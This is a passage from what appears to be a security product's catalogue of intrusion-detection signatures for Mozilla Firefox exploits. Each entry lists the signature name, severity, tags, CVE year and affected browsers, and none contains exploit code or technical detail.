Tags: Any Operating System, Any Hardware, Mozilla Firefox, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Chrome-URL-Information-Disclosure
Description:
Back to top

File-Text_Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1286-5242
Vulnerability: Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-Constructframe-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Constructframe-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-Createimagebitmap-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Createimagebitmap-Integer-Overflow
Description:
Back to top

File-Text_Mozilla-Firefox-Cross-Domain-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Cross-Domain-Information-Disclosure
Description:
Back to top

File-Text_Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow

About this situation: Detects Mozilla Firefox CSS letter-spacing heap overflow exploits
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Suite, CVE2006, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-839-5242
Vulnerability: HTTP-Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow
Description:
Back to top

File-Text_Mozilla-Firefox-CVE-2014-1510-Webidl-Implementation-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox ESR detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla based browsers, CVE2014, CVE2015, Any Operating System not specific, Mozilla based browsers not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Mozilla-Firefox-CVE-2014-1510-Webidl-Implementation-Privilege-Escalation
Firefox-Privileged-JavaScript-Injection
Description:
Back to top

File-Text_Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption

About this situation: Detected attempt to exploit a vulnerability in Mozilla Firefox
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption-2

About this situation: Detected attempt to exploit a vulnerability in Mozilla Firefox
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1435-5242
Vulnerability: Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-Domnoderemoved-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Domnoderemoved-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-enablePrivilege-Vulnerable-Function

About this situation: Firefox enablePrivilege vulnerable function call detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: Mozilla-Firefox-enablePrivilege-Vulnerable-Function
Description:
Back to top

File-Text_Mozilla-Firefox-Event-Handler-Privilege-Escalation-CVE-2007-3737

About this situation: An attempt exploit a vulnerability in Firefox detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-1283-5242
Description:
Back to top

File-Text_Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution

About this situation: Crafted HTML page with malicious arguments passed to the vulnerable "FirefoxURL://" handler detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution
Description:
Back to top

File-Text_Mozilla-Firefox-Floating-Layer-Column-Layout-DoS

About this situation: An attempt to exploit a Mozilla Floating Layer Column Layout DoS vulnerability.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Floating-Layer-Column-Layout-DoS
Description:
Back to top

File-Text_Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-HTTP-Index-Format-File-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-895-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-HTTP-Index-Format-File-Out-Of-Bounds-Read
Description:
Back to top

File-Text_Mozilla-Firefox-Iframe-Style-Change-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1287-5242
Vulnerability: Mozilla-Firefox-Iframe-Style-Change-Handling-Code-Execution
Description:
Back to top

File-Text_Mozilla-Firefox-Information-Disclosure-CVE-2013-1675

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1668-5242
Vulnerability: Mozilla-Firefox-Information-Disclosure-CVE-2013-1675
Description:
Back to top

File-Text_Mozilla-Firefox-InstallTrigger-DoS

About this situation: An attempt to exploit a Mozilla Firefox InstallTrigger DoS vulnerability.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2006, Any Operating System not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-InstallTrigger-DoS
Description:
Back to top

File-Text_Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption

About this situation: An attempt to exploit memory corruption vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-JavaScript-Deleted-Frame-Reference-CVE-2006-3801

About this situation: An attempt exploit a vulnerability in Firefox detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-1283-5242
Description:
Back to top

File-Text_Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow
Description:
Back to top

File-Text_Mozilla-Firefox-JavaScript-HTML-Escaped-Low-Surrogate-Characters-CVE-2008-4066

About this situation: An attempt exploit a vulnerability in Firefox detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-588-5211
Description:
Back to top

File-Text_Mozilla-Firefox-JavaScript-Large-Regexp-Parsing-Memory-Corruption-CVE-2006-1737

About this situation: An attempt exploit a vulnerability in Firefox detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-1283-5242
Description:
Back to top

File-Text_Mozilla-Firefox-Jit-Code-Allocation

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox allowing bypass of ASLR and DEP protections was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, CVE2017, Any Operating System not specific, Generic browser not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1162-5242
Last changed: sgpkg-ips-1319-5242
Vulnerability: Mozilla-Firefox-Jit-Code-Allocation
Mozilla-Firefox-Jit-Code-Allocation-2
Description:
Back to top

File-Text_Mozilla-Firefox-Jit-Compiler-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: Mozilla-Firefox-Jit-Compiler-Type-Confusion
Description:
Back to top

File-Text_Mozilla-Firefox-LookupUCProperty-Memory-Corruption

About this situation: An attempt exploit a vulnerability in Firefox detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-588-5211
Description:
Back to top

File-Text_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution

About this situation: Command execution exploit against Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Netscape, Mozilla Firefox, Adobe Reader, Adobe Acrobat, MS2007-11, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
Microsoft-Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution
Description:
Back to top

File-Text_Mozilla-Firefox-Navigator-Remote-Code-Execution

About this situation: An attempt exploit a Mozilla Firefox Navigator Remote Code Execution vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2006, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Navigator-Remote-Code-Execution
Mozilla-Firefox-nsSVGValue-Denial-Of-Service
Description:
Back to top

File-Text_Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-nsTreeRange-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-nsTreeRange-Use-After-Free
Description:
Back to top

File-Text_Mozilla-Firefox-Object-Mchannel-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Object-Mchannel-Use-After-Free
Description:
Back to top

File-Text_Mozilla-Firefox-Object-Tag-Null-Dereference

About this situation: An attempt to exploit a Object Tag null dereference vulnerability in Mozilaa Firefox browser.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2007, Any Operating System not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Object-Tag-Null-Dereference
Description:
Back to top

File-Text_Mozilla-Firefox-onreadystatechange-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Thunderbird, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-onreadystatechange-Use-After-Free
Description:
Back to top

File-Text_Mozilla-Firefox-onUnload-SSL-Certificate-Spoofing

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Mozilla-Firefox-onUnload-SSL-Certificate-Spoofing
Description:
Back to top

File-Text_Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution
Description:
Back to top

File-Text_Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer

About this situation: An attempt to exploit a code execution vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer
Description:
Back to top

File-Text_Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution

About this situation: Exploit against privilege escalation vulnerability in Mozilla Firefox's JavaScript execution
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution
Description:
Back to top

File-Text_Mozilla-Firefox-Prototype-Pollution-CVE-2022-1802

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1860-5242
Last changed: sgpkg-ips-1861-5242
Vulnerability: Mozilla-Firefox-Prototype-Pollution-CVE-2022-1802
Description:
Back to top

File-Text_Mozilla-Firefox-Resource-URL-Handling-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Resource-URL-Handling-Directory-Traversal
Description:
Back to top

File-Text_Mozilla-Firefox-Sharedworker-Messageport-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Sharedworker-Messageport-Use-After-Free
Description:
Back to top

File-Text_Mozilla-Firefox-Sidebar-Panel-Arbitrary-Code-Execution

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2005, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Sidebar-Panel-Arbitrary-Code-Execution
Description:
Back to top

File-Text_Mozilla-Firefox-SVG-Animation-Use-After-Free-CVE-2016-9079

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1003-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-SVG-Animation-Use-After-Free-CVE-2016-9079
Description:
Back to top

File-Text_Mozilla-Firefox-SVG-Element-Processing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-SVG-Element-Processing-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-Table-Use-After-Free-CVE-2017-5404

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Table-Use-After-Free-CVE-2017-5404
Description:
Back to top

File-Text_Mozilla-Firefox-Tag-Order-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Tag-Order-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-Thunderbird-SeaMonkey-IDBKeyRange-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox, Thunderbird or SeaMonkey detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Thunderbird-SeaMonkey-IDBKeyRange-Use-After-Free
Description:
Back to top

File-Text_Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-449-4219
Vulnerability: Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-Unicode-Data-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Unicode-Data-Denial-Of-Service
Description:
Back to top

File-Text_Mozilla-Firefox-URI-Handling-Vulnerability

About this situation: An attempt to exploit a vulnerability in Mozilla URL protocol handlers was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-URI-Handling-Vulnerability
Description:
Back to top

File-Text_Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Mozilla-Firefox-Webassembly-Table-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Webassembly-Table-Integer-Underflow
Description:
Back to top

File-Text_Mozilla-Firefox-WebGL-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-903-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-WebGL-Integer-Overflow
Description:
Back to top

File-Text_Mozilla-Firefox-XML-Parser-Memory-Corruption-Denial-of-Service

About this situation: An attempt to exploit a Mozilla Firefox XML Parser Memory Corruption Denial of Service vulnerability.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Any Operating System not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-669-5211
Vulnerability: Mozilla-Firefox-XML-Parser-Memory-Corruption-Denial-of-Service
Description:
Back to top

File-Text_Mozilla-Firefox-Xmlserializer-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Xmlserializer-Use-After-Free
Description:
Back to top

File-Text_Mozilla-Firefox-Xraywrapper-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Xraywrapper-Policy-Bypass
Description:
Back to top

File-Text_Mozilla-IDN-Encoded-Hostname-BOF

About this situation: Attempt to exploit Mozilla-based browsers IDN encoded hostname vulnerability
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla based browsers, CVE2005, Windows not specific, Mozilla based browsers not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: HTTP-Mozilla-IDN-Encoded-Hostname-BOF
Description:
Back to top

File-Text_Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow
Description:
Back to top

File-Text_Mozilla-Multiple-Products-Table-Frames-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Multiple-Products-Table-Frames-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Non-Ascii-Hostname-BOF

About this situation: An attempt to exploit a vulnerability in Mozilla detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Netscape, Mozilla Firefox, Mozilla Suite, Mozilla Thunderbird, CVE2004, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-434-4219
Vulnerability: Mozilla-Non-Ascii-Hostname-BOF
Description:
Back to top

